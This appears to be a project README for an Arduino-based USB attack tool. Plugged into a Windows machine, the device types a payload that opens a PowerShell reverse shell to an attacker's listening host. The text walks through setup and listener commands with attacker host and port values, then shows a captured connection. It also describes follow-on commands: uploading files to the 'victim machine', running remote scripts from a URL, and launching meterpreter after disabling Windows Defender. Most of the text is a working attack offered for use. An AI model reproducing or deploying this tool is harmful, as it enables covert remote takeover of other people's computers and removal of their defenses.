This project is to connect a windows maching using an arduino to a listening server using a port and a host through TCP.
Note: A video tutorial will be added on the main Lear Hacking Youtube channel soon!
Once the Arduino is plugged to the windows machine you'll have a powershell of that user.
To complete this you will first need to install the Arduino IDE, and a list of python packages.
pwn, argparse
- Install the Arduino IDE.
- Install python on Linux:
sudo apt update
sudo apt-get install python3.8
- Install pwn
pip install pwn
# or
python3 pip install pwn
After cloning this repository into your linux machine.
To see the help menu of the tool listener:
python3 listen-usb.py -h
usage: listen-usb.py [-h] [-admin] [-debug] --lport LPORT --lhost LHOST --keyboard KEYBOARD
0x539 tool. A tool to connect to thepowershell reversed shell from arduino mini pro.
optional arguments:
-h, --help show this help message and exit
-admin get admin access to powershell but it hopefully press the yes to runAs."
-debug debug mode will keep the cmd window open"
--lport LPORT port example: 4444
--lhost LHOST host example: attackerwebsite.com (or an ip 198.23.44.132)
--keyboard KEYBOARD keyboard example: azerty (or qwerty)
usage: listen-usb.py [-h] [-debug] --lport LPORT --lhost LHOST --keyboard
KEYBOARD
Running this next command will generate an Arduino C code, which is the exploit that gonna be uploaded to the Arduino (Im using Arduino pro mini atmega32u4).
python3 listen-usb.py --lport 9001 --lhost 192.168.183.20 --keyboard qwerty
This will keep listening on the specified port and generate a new file called arduino_qwerty.c .
# fist terminal
kali@kali:~/Documents/tools/github-proj/usb-reverse$ python3 listen-usb.py --lport 9001 --lhost 192.168.183.20 --keyboard qwerty
[+] Creating file: arduino_qwerty.c
[+] File created check it on the current path
[+] Listening..
[+] Trying to bind to 0.0.0.0 on port 9001: Done
[┐] Waiting for connections on 0.0.0.0:9001
# second terminal
kali@kali:~/Documents/tools/github-proj/usb-reverse$ ls
arduino_qwerty.c exploits listen-usb.py README.md
Next thing to do is compile the Arduino c file in the Arduino IDE mentioned earlier, im not gonna go through that cause there's a plenty of tutorials out there to compile an Arduino c code and upload, so just google that, or check this videos playlist Arduino Workshop - Chapter One - Hello World Example.
Now once you plug in the Arduino on the usb port, you will be connected to the tool
kali@kali:~/Documents/tools/github-proj/usb-reverse$ python3 listen-usb.py --lport 9003 --lhost 192.168.183.20 --keyboard qwerty
[+] Creating file: arduino_qwerty.c
[+] File created check it on the current path
[+] Listening..
[+] Trying to bind to 0.0.0.0 on port 9003: Done
[+] Waiting for connections on 0.0.0.0:9003: Got connection from 192.168.183.1 on port 58629
___ ___ ___ _____ ____ ___
/ _ \ \ \ / / | ____| |___ \ / _ \
| | | | \ V / | |__ __) | | (_) |
| | | | > < |___ \ |__ < \__, |
| |_| | / . \ ___) | ___) | / /
\___/ /__/ \__\ |____/ |____/ /_/
Tool.
!0x53O>
Now that you're connected to the tool, you can interact with the powershell and use the tool commands.
Type help to get the help menu
commands:
ps connect to powershell
upload download file
enumerate enumerate windows vulnerabilities
urlexec execute a powershell script from a link
meterpreter run meterpreter default port 9090
help open this help menu
exit quit this tool
Gives you a prompt to powershell on that windows.
Uploads a file to the victim machine.
usuage:
upload <link> <filename>
example:
uplaod https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1 windowsEnum.ps1
Enumerate the windows privileges and informations.
Execute a powershell script from a url
generate a reverse tcp exe file to default lport 9090 (you can change the lports and lhost with the httpport all together), and run it in the victim's machine after disabling Windows defender (-admin must be specified after listen-usb.py before generating the arduino c payload), which prompt you a meterpreter (wigth all preveliges).
mp
- This tool was Created by l0x539.